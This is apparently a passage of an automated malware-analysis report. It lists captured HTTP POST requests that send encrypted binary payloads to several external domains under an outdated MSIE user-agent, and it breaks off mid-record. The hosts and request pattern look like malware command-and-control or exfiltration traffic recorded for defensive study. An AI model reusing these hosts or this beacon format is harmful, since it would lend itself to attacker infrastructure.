w5SAbN0UIZTeyD/IFBAC+hZZ/l+L1eNZYSv+DJZe/tHUmBu8uIlXX8BsOMgisPuNaZODQCOYtijy9GMVa25dqhlLVcvrAo6XGOqHA5CNUwilJWrO5Ymuv2XISrbyNQCHLlfGap+PYdI+Lo1sJpTBSex9+QMUEIdIvgZc53OfdnqaKp7x2EB2RkwIhcvT1cOaPK8cVgAvHVXTXEEzz1qDbXb+RxgJPR7SYp9ryvrdlJxKRJZOyA3Z4vnWafYbn3JVKmR2cTcPBG2zRkAEQnNhz0X1tXB2bdMoqSCRKxkEo/4wEPf+r+2DdrQMYdBYNR2/YR3WCibILVvKES6gUvf1sNMUbXAtz+1R5S41ItRMd4uMQM9s3arzIk7r806+lrKdUxNiOVIs7uRiiA991dxg/ic4f0NGlObNqfsEqhWYHyecPdCH+0NnpOsJyrE/MkPZNJqJr38DHeyEfmklMgYKSzI0pIpvM/bmu2ZP36u7MxnMKZTmSFx0QMWFBOBaDg2eRVjIiumZtrSabsiQrnpeS3bsV/BNaUFOyc/PUe7jc4Sh0qkyw7WBynP70Nrrb1qbsHErWBXDQb/+
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 69 43 6c 49 51 65 71 37 6d 4d 7a 79 47 59 7a 57 7a 62 72 70 31 4b 31 4d 33 46 77 61 45 73 4e 70 76 6b 79 6c 61 67 44 6a 74 48 53 56 74 73 53 37 6a 4e 39 65 68 35 51 50 35 6a 53 42 4e 2b 44 6a 2b 4e 4e 30 6c 53 72 4d 36 37 58 59 47 6b 57 38 6d 59 6e 34 4b 59 79 49 43 6f 5a 31 2b 43 57 70 4a 2b 72 6f 33 46 50 54 46 42 65 76 32 6a 45 37 78 43 6a 58 53 70 66 6d 38 4d 5a 50 68 62 79 36 50 31 4c 79 56 70 73 6e 76 54 72 7a 2b 30 5a 47 71 6f 73 67 4b 46 50 33 62 64 64 77 30 31 73 7a 37 2f 62 62 37 4e 34 4e 6c 51 30 71 44 54 51 51 68 70 78 41 68 6c 53 47 62 4d 53 64 62 79 51 45 72 68 65 6d 34 50 77 44 4b 35 2b 58 68 68 6f 2b 66 35 42 2b 57 48 78 37 41 70 36 56 6c 46 43 72 7a 6d 64 62 6a 33 79 38 4c 32 39 6f 37 48 66 66 33 6b 4d 6b 51 59 74 75 5a 56 64 44 4a 48 30 7a 36 39 58 38 65 6a 57 66 52 57 4d 44 4d 50 58 4f 6d 58 79 64 73 67 31 68 75 36 52 62 64 70 4c 4d 30 72 48 6b 45 57 2b 67 52 5a 49 77 6b 53 2f 2b 4d 57 76 6f 69 4d 4a 43 36 31 41 66 45 47 71 31 69 51 34 67 62 55 37 57 47 61 32 4d 44 74 6d 4f 78 6c 62 59 37 56 53 4a 71 44 6c 48 6c 47 7a 56 32 33 33 78 4a 7a 57 41 59 57 47 33 32 2b 31 4d 35 50 32 44 43 70 64 4b 48 38 32 46 2b 72 61 4a 2f 45 39 6c 77 2b 61 52 78 64 38 58 47 68 71 61 4c 4b 54 7a 5a 5a 32 6a 75 4b 66 65 64 7a 6b 74 49 73 35 76 51 6a 52 6a 46 68 56 6e 54 55 35 38 76 49 4b 5a 6e 54 71 46 37 77 73 34 78 54 6a 4d 35 72 59 6e 34 73 35 45 37 62 6b 31 68 56 42 53 4e 37 47 32 55 45 35 6f 78 77 52 4e 59 70 70 2b 52 78 62 7a 70 77 4b 48 54 48 41 6b 38 57 64 35 67 4c 48 76 55 56 4a 77 43 47 42 56 6c 2f 58 33 77 53 2b 51 69 43 79 65 51 30 6e 35 7a 6d 64 48 45 58 33 67 77 55 38 74 41 46 50 74 72 4c 6c 6f 4d 38 7a 31 75 78 7a 55 30 45 58 53 71 63 52 6e 6f 67 50 37 79 4c 75 42 33 42 48 30 50 6a 2b 70 58 4d 4b 57 71 57 42 4f 59 79 64 67 35 56 5a 70 Data Ascii: iClIQeq7mMzyGYzWzbrp1K1M3FwaEsNpvkylagDjtHSVtsS7jN9eh5QP5jSBN+Dj+NN0lSrM67XYGkW8mYn4KYyICoZ1+CWpJ+ro3FPTFBev2jE7xCjXSpfm8MZPhby6P1LyVpsnvTrz+0ZGqosgKFP3bddw01sz7/bb7N4NlQ0qDTQQhpxAhlSGbMSdbyQErhem4PwDK5+Xhho+f5B+WHx7Ap6VlFCrzmdbj3y8L29o7Hff3kMkQYtuZVdDJH0z69X8ejWfRWMDMPXOmXydsg1hu6RbdpLM0rHkEW+gRZIwkS/+MWvoiMJC61AfEGq1iQ4gbU7WGa2MDtmOxlbY7VSJqDlHlGzV233xJzWAYWG32+1M5P2DCpdKH82F+raJ/E9lw+aRxd8XGhqaLKTzZZ2juKfedzktIs5vQjRjFhVnTU58vIKZnTqF7ws4xTjM5rYn4s5E7bk1hVBSN7G2UE5oxwRNYpp+RxbzpwKHTHAk8Wd5gLHvUVJwCGBVl/X3wS+QiCyeQ0n5zmdHEX3gwU8tAFPtrLloM8z1uxzU0EXSqcRnogP7yLuB3BH0Pj+pXMKWqWBOYydg5VZp
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 33 6f 4e 38 41 38 32 72 48 5a 53 61 38 6b 56 66 52 46 70 70 57 34 59 39 66 4c 67 37 6e 7a 78 51 55 54 6d 79 76 6a 30 74 62 68 6e 79 6a 76 4b 56 47 69 59 4b 68 73 32 77 78 72 71 6d 57 49 6d 74 67 71 4f 47 63 79 76 2b 4f 68 48 37 43 74 37 2b 75 62 51 46 71 4e 68 32 2b 6d 31 49 41 77 31 59 63 6f 63 42 44 79 53 79 36 78 58 43 63 73 4d 4c 79 66 66 56 34 38 4a 6f 53 2b 38 7a 42 63 2f 2b 51 2b 33 43 66 64 33 38 64 4b 49 71 6f 54 2b 43 58 66 4e 4e 65 2b 64 76 4b 56 61 6a 5a 67 4d 72 69 68 63 4a 34 38 57 66 71 6f 70 38 56 77 72 43 4f 6e 6b 58 74 70 30 67 65 61 71 4b 34 37 63 76 7a 4a 45 6d 43 71 75 74 54 31 54 31 6b 51 55 59 65 2b 35 4c 75 33 79 5a 76 2f 62 6b 4e 47 45 50 65 2b 2f 55 75 34 63 42 7a 65 67 37 36 72 52 63 74 4d 79 41 46 45 2b 34 6c 32 38 65 41 2b 31 79 4c 35 53 44 69 62 59 30 54 6a 33 2f 4b 35 4e 77 67 70 49 71 71 7a 6f 6b 50 44 2f 61 53 2f 70 36 55 43 33 71 4c 76 44 55 34 76 4d 43 34 55 47 37 38 70 63 43 61 37 41 33 66 2b 59 62 35 73 6e 6b 67 48 4f 42 33 33 61 78 39 35 36 71 57 63 65 67 30 30 55 63 41 5a 32 64 62 38 6e 39 42 61 46 49 6c 65 6a 73 61 35 41 78 45 67 4b 57 43 59 45 4e 49 49 70 38 30 45 33 36 58 68 30 69 55 36 44 44 65 71 51 59 35 30 37 50 46 5a 63 7a 58 6a 70 31 48 39 4b 4d 4b 6e 2b 43 53 48 6d 4e 32 4c 78 78 61 6b 6a 64 52 38 55 74 54 33 30 74 44 35 36 46 57 5a 52 47 59 46 61 33 58 62 2f 44 6b 35 64 41 53 54 35 52 38 71 4e 76 67 6a 6c 51 45 67 61 46 70 52 65 58 4f 2f 6c 7a 78 41 7a 54 57 64 7a 37 2b 57 4d 79 6e 45 35 71 63 68 48 36 37 43 79 51 51 36 51 73 4b 77 75 73 73 42 6e 65 45 71 49 53 4e 70 65 6e 4d 79 2f 53 76 4b 38 72 78 79 2b 59 76 34 2f 74 63 67 30 4d 5a 32 73 6f 65 37 4c 30 74 4a 54 7a 73 4f 49 59 Data Ascii: 3oN8A82rHZSa8kVfRFppW4Y9fLg7nzxQUTmyvj0tbhnyjvKVGiYKhs2wxrqmWImtgqOGcyv+OhH7Ct7+ubQFqNh2+m1IAw1YcocBDySy6xXCcsMLyffV48JoS+8zBc/+Q+3Cfd38dKIqoT+CXfNNe+dvKVajZgMrihcJ48Wfqop8VwrCOnkXtp0geaqK47cvzJEmCqutT1T1kQUYe+5Lu3yZv/bkNGEPe+/Uu4cBzeg76rRctMyAFE+4l28eA+1yL5SDibY0Tj3/K5NwgpIqqzokPD/aS/p6UC3qLvDU4vMC4UG78pcCa7A3f+Yb5snkgHOB33ax956qWceg00UcAZ2db8n9BaFIlejsa5AxEgKWCYENIIp80E36Xh0iU6DDeqQY507PFZczXjp1H9KMKn+CSHmN2LxxakjdR8UtT30tD56FWZRGYFa3Xb/Dk5dAST5R8qNvgjlQEgaFpReXO/lzxAzTWdz7+WMynE5qchH67CyQQ6QsKwussBneEqISNpenMy/SvK8rxy+Yv4/tcg0MZ2soe7L0tJTzsOIY
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 33 56 5a 77 43 32 4f 4f 4c 70 53 44 6e 46 62 44 36 71 41 79 4e 34 79 2b 33 39 2b 4a 33 4c 41 70 52 2b 71 65 59 34 37 69 58 33 2f 6a 69 6e 79 56 77 2f 38 44 68 39 33 59 68 70 48 2f 41 4d 75 46 30 65 38 6c 71 56 4f 64 2f 2b 46 67 76 33 61 39 54 4d 4d 69 48 53 72 51 61 45 4d 6e 54 55 4f 46 58 48 30 6c 56 2b 63 56 64 66 36 6e 52 38 5a 70 2f 35 65 66 6b 41 41 6e 58 53 37 59 55 55 6a 34 46 4c 49 42 54 35 6b 68 73 57 2f 39 59 5a 49 53 64 6a 66 6c 50 64 70 6d 49 35 65 58 78 53 6f 4d 6f 34 41 6f 74 69 43 47 6f 63 6d 53 58 4c 4e 47 6a 64 48 45 75 31 39 44 44 4d 74 31 68 49 7a 77 39 51 68 6f 4b 5a 63 4e 79 71 75 55 2f 51 6f 46 52 72 67 34 4f 6d 53 51 61 64 4f 34 50 56 44 5a 54 6d 78 49 39 68 52 30 6c 33 36 48 4f 31 5a 78 45 4f 4c 72 4c 6b 65 47 6d 56 4c 66 4a 4c 61 72 6b 64 38 56 38 61 42 55 4b 33 4b 38 4e 48 79 58 72 76 6b 58 45 59 70 66 69 58 38 52 38 47 55 6c 78 6d 46 39 59 63 6a 63 4f 55 6c 58 69 37 6e 30 67 61 59 75 49 33 45 57 35 75 4e 53 78 4c 64 77 32 44 2f 77 35 44 36 52 38 66 52 6f 4c 47 4f 46 48 68 48 72 37 4f 33 75 35 6d 57 4a 78 6f 2b 43 6d 55 67 33 34 37 35 34 6c 49 6d 71 42 47 32 71 55 2b 57 72 45 52 67 45 75 41 79 70 30 50 33 77 4d 4b 66 6e 71 6d 6d 79 4a 5a 50 4e 5a 58 76 44 64 59 54 42 47 69 71 35 6c 30 6b 38 5a 6f 65 68 41 63 45 69 6c 2b 63 7a 2f 7a 55 53 45 49 55 34 68 69 66 2b 4c 6f 51 71 54 74 70 75 68 48 77 4d 43 6a 59 37 5a 37 49 41 57 68 63 31 59 6f 49 64 44 61 2b 30 59 79 39 79 78 71 62 63 36 67 6c 34 51 73 71 4e 69 64 62 4b 76 59 70 6c 52 42 50 74 7a 57 70 51 64 33 70 37 33 76 43 2f 49 51 6a 4c 67 39 6c 39 41 5a 54 6f 57 68 39 5a 6a 31 6d 4a 6d 34 61 77 4d 45 79 34 72 62 78 49 61 64 7a 6b 5a 7a 31 6c 38 6a 69 38 53 57 51 74 36 78 61 53 2f 49 6d 45 4d 79 4f 54 66 66 67 73 44 42 4e 39 2f 61 33 76 43 67 3d 3d Data Ascii: 3VZwC2OOLpSDnFbD6qAyN4y+39+J3LApR+qeY47iX3/jinyVw/8Dh93YhpH/AMuF0e8lqVOd/+Fgv3a9TMMiHSrQaEMnTUOFXH0lV+cVdf6nR8Zp/5efkAAnXS7YUUj4FLIBT5khsW/9YZISdjflPdpmI5eXxSoMo4AotiCGocmSXLNGjdHEu19DDMt1hIzw9QhoKZcNyquU/QoFRrg4OmSQadO4PVDZTmxI9hR0l36HO1ZxEOLrLkeGmVLfJLarkd8V8aBUK3K8NHyXrvkXEYpfiX8R8GUlxmF9YcjcOUlXi7n0gaYuI3EW5uNSxLdw2D/w5D6R8fRoLGOFHhHr7O3u5mWJxo+CmUg34754lImqBG2qU+WrERgEuAyp0P3wMKfnqmmyJZPNZXvDdYTBGiq5l0k8ZoehAcEil+cz/zUSEIU4hif+LoQqTtpuhHwMCjY7Z7IAWhc1YoIdDa+0Yy9yxqbc6gl4QsqNidbKvYplRBPtzWpQd3p73vC/IQjLg9l9AZToWh9Zj1mJm4awMEy4rbxIadzkZz1l8ji8SWQt6xaS/ImEMyOTffgsDBN9/a3vCg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 6f 62 41 42 47 66 4b 75 4a 70 53 62 6c 34 59 55 4a 55 47 38 51 66 57 63 71 50 37 43 56 53 6a 67 52 6d 77 67 72 38 68 57 76 36 52 47 6d 32 63 61 59 4b 53 75 69 52 4c 4e 4f 4d 51 4c 6c 47 58 53 43 32 70 2b 70 36 61 30 70 35 5a 37 69 30 4c 6f 59 46 77 48 65 70 55 64 47 53 70 75 65 4f 50 48 58 61 68 6a 71 46 54 50 76 73 62 78 42 4b 74 4d 6b 6b 66 6c 62 77 45 44 45 75 75 78 34 42 70 35 77 7a 52 41 34 4a 50 45 6e 79 69 43 66 66 79 6b 2b 42 43 50 2b 50 4f 38 47 61 73 41 35 62 79 6a 7a 45 52 35 6e 2b 50 73 4c 77 67 75 52 2b 4a 66 66 32 62 78 6c 54 4f 51 77 6b 62 74 76 77 62 37 66 74 6c 68 69 6a 41 4d 61 64 68 33 71 6a 30 49 66 38 52 77 2f 65 6e 6b 36 61 45 34 4c 5a 5a 42 2b 76 4f 51 4b 65 54 4c 71 4b 78 79 44 67 31 50 54 74 71 4b 6d 4c 34 75 68 4b 34 61 6b 68 5a 46 48 30 51 31 72 58 4f 71 59 68 78 71 6c 52 63 59 49 65 37 63 58 74 5a 64 77 44 76 67 56 52 6b 30 75 67 51 73 4c 79 78 64 44 4f 5a 2b 69 2b 46 61 77 65 77 6a 72 59 43 4b 37 50 76 52 64 39 30 59 42 70 4b 38 7a 78 4b 77 2b 71 51 79 71 67 6a 79 59 66 6f 47 4c 51 37 45 37 36 4a 2f 78 45 4d 75 6d 52 73 56 41 30 30 67 70 41 43 47 37 67 2b 7a 75 61 75 73 4c 6d 79 70 2b 31 50 43 69 32 7a 32 63 45 4d 70 59 65 33 53 6a 33 64 31 2f 2b 48 62 63 71 4c 63 55 61 36 55 6e 33 4f 4b 34 67 73 57 44 67 4e 6c 44 71 51 31 39 66 76 42 67 61 63 75 65 6e 6c 71 4d 57 67 4c 6c 32 4a 43 6e 58 35 58 4b 78 72 7a 62 70 63 36 72 74 39 4c 71 4a 4a 79 32 5a 53 64 4b 65 50 6d 32 72 49 77 4b 42 6f 54 45 4a 49 6f 70 34 2b 63 52 39 4a 6f 50 41 46 33 38 78 38 4d 2f 7a 74 56 61 4b 4e 74 50 68 4f 68 63 58 39 5a 6f 76 59 49 30 61 43 30 34 56 73 41 69 57 34 4d 4b 4c 54 33 66 4c 74 50 54 2f 73 49 Data Ascii: obABGfKuJpSbl4YUJUG8QfWcqP7CVSjgRmwgr8hWv6RGm2caYKSuiRLNOMQLlGXSC2p+p6a0p5Z7i0LoYFwHepUdGSpueOPHXahjqFTPvsbxBKtMkkflbwEDEuux4Bp5wzRA4JPEnyiCffyk+BCP+PO8GasA5byjzER5n+PsLwguR+Jff2bxlTOQwkbtvwb7ftlhijAMadh3qj0If8Rw/enk6aE4LZZB+vOQKeTLqKxyDg1PTtqKmL4uhK4akhZFH0Q1rXOqYhxqlRcYIe7cXtZdwDvgVRk0ugQsLyxdDOZ+i+FawewjrYCK7PvRd90YBpK8zxKw+qQyqgjyYfoGLQ7E76J/xEMumRsVA00gpACG7g+zuausLmyp+1PCi2z2cEMpYe3Sj3d1/+HbcqLcUa6Un3OK4gsWDgNlDqQ19fvBgacuenlqMWgLl2JCnX5XKxrzbpc6rt9LqJJy2ZSdKePm2rIwKBoTEJIop4+cR9JoPAF38x8M/ztVaKNtPhOhcX9ZovYI0aC04VsAiW4MKLT3fLtPT/sI
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 34 62 77 67 76 6e 57 37 49 35 54 48 55 45 63 34 33 42 5a 64 54 57 37 33 33 47 34 44 7a 45 6a 66 65 62 65 71 69 47 6c 54 76 2f 37 56 56 59 52 64 56 38 2f 63 76 49 54 48 4a 4e 47 6e 67 54 33 51 67 73 76 72 34 46 69 55 35 48 39 70 6b 5a 59 58 62 70 33 33 69 52 68 69 73 6b 6a 67 4c 34 6a 35 56 5a 73 37 31 59 4f 76 6d 6c 44 56 57 6b 67 66 44 50 6f 49 52 41 30 51 4a 66 4f 76 49 32 38 48 55 45 4a 31 52 46 51 55 31 45 43 39 70 35 52 50 49 6e 31 52 4c 39 62 70 33 41 7a 33 31 55 58 52 70 4a 51 75 48 48 52 7a 66 70 41 50 5a 6e 59 6e 37 4c 35 62 45 74 74 6a 73 30 33 37 45 66 62 6d 74 46 6a 56 36 45 68 77 34 42 64 41 4d 30 52 32 37 4a 33 2f 69 63 75 30 4c 37 67 79 6d 49 51 39 2f 79 30 66 46 66 45 6a 31 5a 6d 6e 39 38 4f 69 73 59 75 4c 68 6f 75 44 41 41 74 4c 42 7a 37 42 37 46 2f 50 5a 6a 6b 69 64 79 2b 6d 61 59 68 53 77 6f 31 4d 74 79 48 62 33 47 55 65 2f 37 49 64 42 4f 6a 49 42 69 59 6f 6d 44 78 53 47 2b 39 75 6b 58 64 59 5a 50 39 35 50 67 57 4c 62 47 52 39 6a 70 32 49 46 53 31 76 52 34 30 63 76 77 6d 6d 63 55 78 76 53 2f 36 67 36 44 57 4a 32 59 73 68 67 75 32 67 64 76 52 55 67 62 46 75 34 35 35 69 2f 31 75 49 6d 50 6a 36 75 4b 4e 34 74 71 4d 63 42 58 54 64 41 54 43 62 75 2b 64 6a 65 6b 59 4d 31 6b 42 52 5a 33 5a 36 35 35 67 33 38 6b 33 78 70 6e 63 59 68 37 6e 74 63 74 34 6f 2f 41 71 6b 67 49 70 74 41 4a 48 50 30 72 78 70 36 2f 59 62 47 72 70 4a 36 4f 62 57 56 74 43 37 45 31 4b 58 76 6f 58 75 30 6b 66 45 75 78 6d 51 62 68 67 47 43 4c 2f 71 36 70 30 4a 6c 74 4f 4e 42 47 4b 42 69 41 74 65 67 4e 4e 55 58 68 45 76 56 65 48 73 4f 39 54 42 66 73 65 2f 46 35 4d 6b 75 6f 59 77 6e 6e 61 64 62 72 69 41 6a 4e 41 61 4e 76 38 33 50 2b 63 48 77 4a 7a 30 4e 34 62 6c 75 67 54 42 63 72 49 6d 43 78 59 62 44 53 50 4c 4f 5a 71 33 78 33 34 6f Data Ascii: 4bwgvnW7I5THUEc43BZdTW733G4DzEjfebeqiGlTv/7VVYRdV8/cvITHJNGngT3Qgsvr4FiU5H9pkZYXbp33iRhiskjgL4j5VZs71YOvmlDVWkgfDPoIRA0QJfOvI28HUEJ1RFQU1EC9p5RPIn1RL9bp3Az31UXRpJQuHHRzfpAPZnYn7L5bEttjs037EfbmtFjV6Ehw4BdAM0R27J3/icu0L7gymIQ9/y0fFfEj1Zmn98OisYuLhouDAAtLBz7B7F/PZjkidy+maYhSwo1MtyHb3GUe/7IdBOjIBiYomDxSG+9ukXdYZP95PgWLbGR9jp2IFS1vR40cvwmmcUxvS/6g6DWJ2Yshgu2gdvRUgbFu455i/1uImPj6uKN4tqMcBXTdATCbu+djekYM1kBRZ3Z655g38k3xpncYh7ntct4o/AqkgIptAJHP0rxp6/YbGrpJ6ObWVtC7E1KXvoXu0kfEuxmQbhgGCL/q6p0JltONBGKBiAtegNNUXhEvVeHsO9TBfse/F5MkuoYwnnadbriAjNAaNv83P+cHwJz0N4blugTBcrImCxYbDSPLOZq3x34o
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 4d 62 36 38 67 65 42 6c 4d 70 53 55 63 57 79 68 4d 31 39 31 79 68 50 6f 4d 61 4a 49 61 76 30 33 46 49 4e 53 48 4d 62 64 4d 6b 51 72 57 50 71 56 48 6d 61 76 42 36 57 46 2f 50 6f 65 49 6a 43 34 38 77 69 43 50 35 2b 37 47 4b 39 6c 48 56 36 4c 51 61 4c 6c 32 32 6a 63 51 35 61 4a 44 76 49 56 2b 7a 37 6b 42 4b 61 64 54 46 52 2f 42 33 35 65 78 68 67 78 57 57 33 53 63 31 69 6b 4d 51 4f 4e 4a 6c 77 35 66 46 54 77 39 45 44 59 33 47 67 6a 77 30 52 2b 53 72 34 59 70 47 44 6f 73 4a 67 36 5a 7a 6f 58 30 73 54 48 2f 70 4b 37 6e 33 73 6d 4c 46 35 74 6a 33 6b 75 63 4a 31 72 47 56 51 65 4f 6e 62 54 61 70 4d 68 39 34 49 4e 6d 45 57 6a 4b 7a 2f 65 49 38 67 43 30 51 4d 7a 74 71 48 6a 36 68 74 39 53 73 42 6d 56 4f 79 75 50 68 47 45 4f 55 68 56 57 54 31 6b 45 32 77 71 42 57 66 69 5a 30 31 55 61 2b 41 58 77 73 44 2f 38 55 62 44 57 37 77 64 32 63 42 7a 56 67 55 51 34 6e 47 6c 63 51 75 51 51 6f 6d 49 44 4d 32 74 6e 6f 57 45 73 52 4a 34 5a 65 35 4f 53 35 55 51 6b 43 63 58 77 58 2b 38 66 50 79 38 55 45 65 64 6f 76 58 79 61 59 2f 38 57 6e 4a 78 74 59 69 48 41 38 62 36 59 46 45 64 6e 78 30 43 42 38 63 75 4b 75 4e 6a 2f 66 6c 54 51 66 48 77 47 43 71 78 64 54 54 48 63 36 54 4f 55 36 6f 30 73 6f 73 42 4c 42 54 62 52 36 73 2f 59 55 6a 65 56 79 66 58 6e 77 79 31 48 73 63 67 65 73 4b 58 74 73 4e 50 4f 45 47 75 66 61 38 58 49 69 66 48 30 4b 68 58 39 56 43 63 6e 6a 57 50 57 56 35 53 31 75 51 6c 72 43 33 66 55 35 33 73 38 56 6f 47 4c 45 6c 39 31 66 36 59 44 67 59 72 50 45 47 64 64 78 4a 71 77 37 6e 38 39 35 78 75 6f 34 31 74 4e 4b 46 63 2b 69 63 56 4c 6d 7a 2b 45 75 6b 6f 6e 77 43 42 41 71 38 51 71 5a 78 2f 6e 4a 37 5a 2b 63 65 33 63 6b 58 54 7a 59 54 61 57 49 41 5a 4a 74 6f 32 4f 76 6b 31 5a 63 68 53 30 49 4f 6e 65 51 3d 3d Data Ascii: Mb68geBlMpSUcWyhM191yhPoMaJIav03FINSHMbdMkQrWPqVHmavB6WF/PoeIjC48wiCP5+7GK9lHV6LQaLl22jcQ5aJDvIV+z7kBKadTFR/B35exhgxWW3Sc1ikMQONJlw5fFTw9EDY3Ggjw0R+Sr4YpGDosJg6ZzoX0sTH/pK7n3smLF5tj3kucJ1rGVQeOnbTapMh94INmEWjKz/eI8gC0QMztqHj6ht9SsBmVOyuPhGEOUhVWT1kE2wqBWfiZ01Ua+AXwsD/8UbDW7wd2cBzVgUQ4nGlcQuQQomIDM2tnoWEsRJ4Ze5OS5UQkCcXwX+8fPy8UEedovXyaY/8WnJxtYiHA8b6YFEdnx0CB8cuKuNj/flTQfHwGCqxdTTHc6TOU6o0sosBLBTbR6s/YUjeVyfXnwy1HscgesKXtsNPOEGufa8XIifH0KhX9VCcnjWPWV5S1uQlrC3fU53s8VoGLEl91f6YDgYrPEGddxJqw7n895xuo41tNKFc+icVLmz+EukonwCBAq8QqZx/nJ7Z+ce3ckXTzYTaWIAZJto2Ovk1ZchS0IOneQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 6d 4e 41 47 36 7a 62 52 4e 5a 54 31 54 36 69 76 6b 52 66 4d 6f 74 6d 76 31 68 4e 57 76 37 48 42 79 69 6a 43 39 52 56 37 74 6e 66 36 63 35 52 4b 6e 71 79 4d 6a 61 51 55 42 31 32 6c 55 54 43 45 68 30 77 6f 61 6a 50 78 51 66 39 33 32 56 71 6e 6a 49 42 56 36 4e 4b 6e 48 35 72 4d 62 52 6d 44 2b 74 53 68 42 79 67 30 4e 75 47 65 50 76 4b 6f 53 69 57 53 43 64 32 71 6c 5a 58 67 4a 4c 70 5a 69 4f 70 52 73 67 77 34 36 58 44 35 71 39 4a 70 64 58 4b 4f 6a 6e 4e 36 53 6b 4c 39 4d 50 43 5a 4e 68 48 72 52 67 6c 33 55 6e 6d 4c 59 4f 73 4f 64 4b 42 38 32 58 59 53 64 6a 64 35 64 6a 74 2f 54 75 66 5a 6b 5a 76 57 42 2b 6e 49 75 30 72 63 43 6c 5a 49 68 42 4c 68 4d 59 42 37 4f 5a 6d 53 41 54 4b 6a 56 52 74 70 58 68 48 36 5a 77 5a 34 5a 35 73 2b 72 39 45 6b 42 46 73 54 51 43 4a 57 67 76 6c 66 31 37 67 31 41 4d 59 6d 6d 33 72 4b 76 37 6c 53 2b 39 67 57 32 45 79 44 48 4a 45 61 4b 4c 6e 58 74 43 68 75 66 71 4e 4a 45 71 2f 35 71 73 79 79 42 55 70 5a 59 75 32 71 4c 79 61 31 44 33 4d 73 54 47 6b 34 6b 53 52 6d 78 67 75 79 2b 66 6f 6b 76 43 50 64 68 77 36 73 36 65 4f 6c 35 59 49 39 6c 79 2b 49 36 30 54 4c 76 71 56 62 65 63 6d 31 7a 67 31 36 34 4c 71 59 79 38 71 52 48 4d 57 51 32 34 59 4b 43 66 73 56 50 38 6e 6c 6f 62 2f 45 52 76 36 38 6b 74 38 74 37 42 45 78 41 69 31 51 68 70 70 2f 68 33 68 79 4e 48 42 49 78 53 71 39 4a 4d 72 52 71 64 73 42 58 4b 7a 52 6f 72 31 6f 6d 74 63 6d 36 64 71 75 55 69 6d 71 4b 69 56 63 4e 6d 76 48 2b 46 54 76 79 31 46 45 45 77 49 72 76 57 57 42 36 36 6a 51 57 4b 66 77 46 56 34 4b 73 30 30 43 4a 31 78 31 6c 76 66 32 79 69 4d 50 71 49 70 4f 6e 31 64 79 68 46 67 4e 56 6b 5a 51 44 50 53 67 30 2b 70 57 64 51 42 66 4c 64 50 6d 6d 6d 48 76 32 55 6c 75 57 30 72 55 6f 53 4f 47 75 6b 56 6b 42 32 70 36 42 78 71 67 4b 71 72 72 6b 49 76 31 56 51 59 64 65 44 6e 74 59 67 3d 3d Data Ascii: mNAG6zbRNZT1T6ivkRfMotmv1hNWv7HByijC9RV7tnf6c5RKnqyMjaQUB12lUTCEh0woajPxQf932VqnjIBV6NKnH5rMbRmD+tShByg0NuGePvKoSiWSCd2qlZXgJLpZiOpRsgw46XD5q9JpdXKOjnN6SkL9MPCZNhHrRgl3UnmLYOsOdKB82XYSdjd5djt/TufZkZvWB+nIu0rcClZIhBLhMYB7OZmSATKjVRtpXhH6ZwZ4Z5s+r9EkBFsTQCJWgvlf17g1AMYmm3rKv7lS+9gW2EyDHJEaKLnXtChufqNJEq/5qsyyBUpZYu2qLya1D3MsTGk4kSRmxguy+fokvCPdhw6s6eOl5YI9ly+I60TLvqVbecm1zg164LqYy8qRHMWQ24YKCfsVP8nlob/ERv68kt8t7BExAi1Qhpp/h3hyNHBIxSq9JMrRqdsBXKzRor1omtcm6dquUimqKiVcNmvH+FTvy1FEEwIrvWWB66jQWKfwFV4Ks00CJ1x1lvf2yiMPqIpOn1dyhFgNVkZQDPSg0+pWdQBfLdPmmmHv2UluW0rUoSOGukVkB2p6BxqgKqrrkIv1VQYdeDntYg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 53 57 51 51 45 57 55 4e 4e 35 53 63 45 53 71 69 44 4e 39 74 41 64 35 4f 6b 4f 6d 7a 33 43 6f 5a 61 61 6a 37 4c 4c 50 32 65 31 34 35 44 63 66 37 42 33 54 62 32 37 52 64 5a 42 57 63 37 78 36 78 72 4a 2b 36 72 64 38 6f 58 46 4e 5a 65 75 69 61 38 30 50 4f 39 38 66 79 5a 5a 4f 39 7a 73 62 36 58 70 31 31 2f 6a 79 74 4a 6e 79 4b 39 4d 4a 58 6d 73 4c 53 35 57 47 63 63 52 53 78 78 52 32 67 35 4d 2b 4a 55 42 55 46 51 7a 54 31 35 4b 78 6c 36 52 4b 31 71 6e 42 64 36 63 68 51 4d 54 50 6f 37 79 62 45 6d 54 77 45 4c 66 38 73 65 53 6d 37 48 39 66 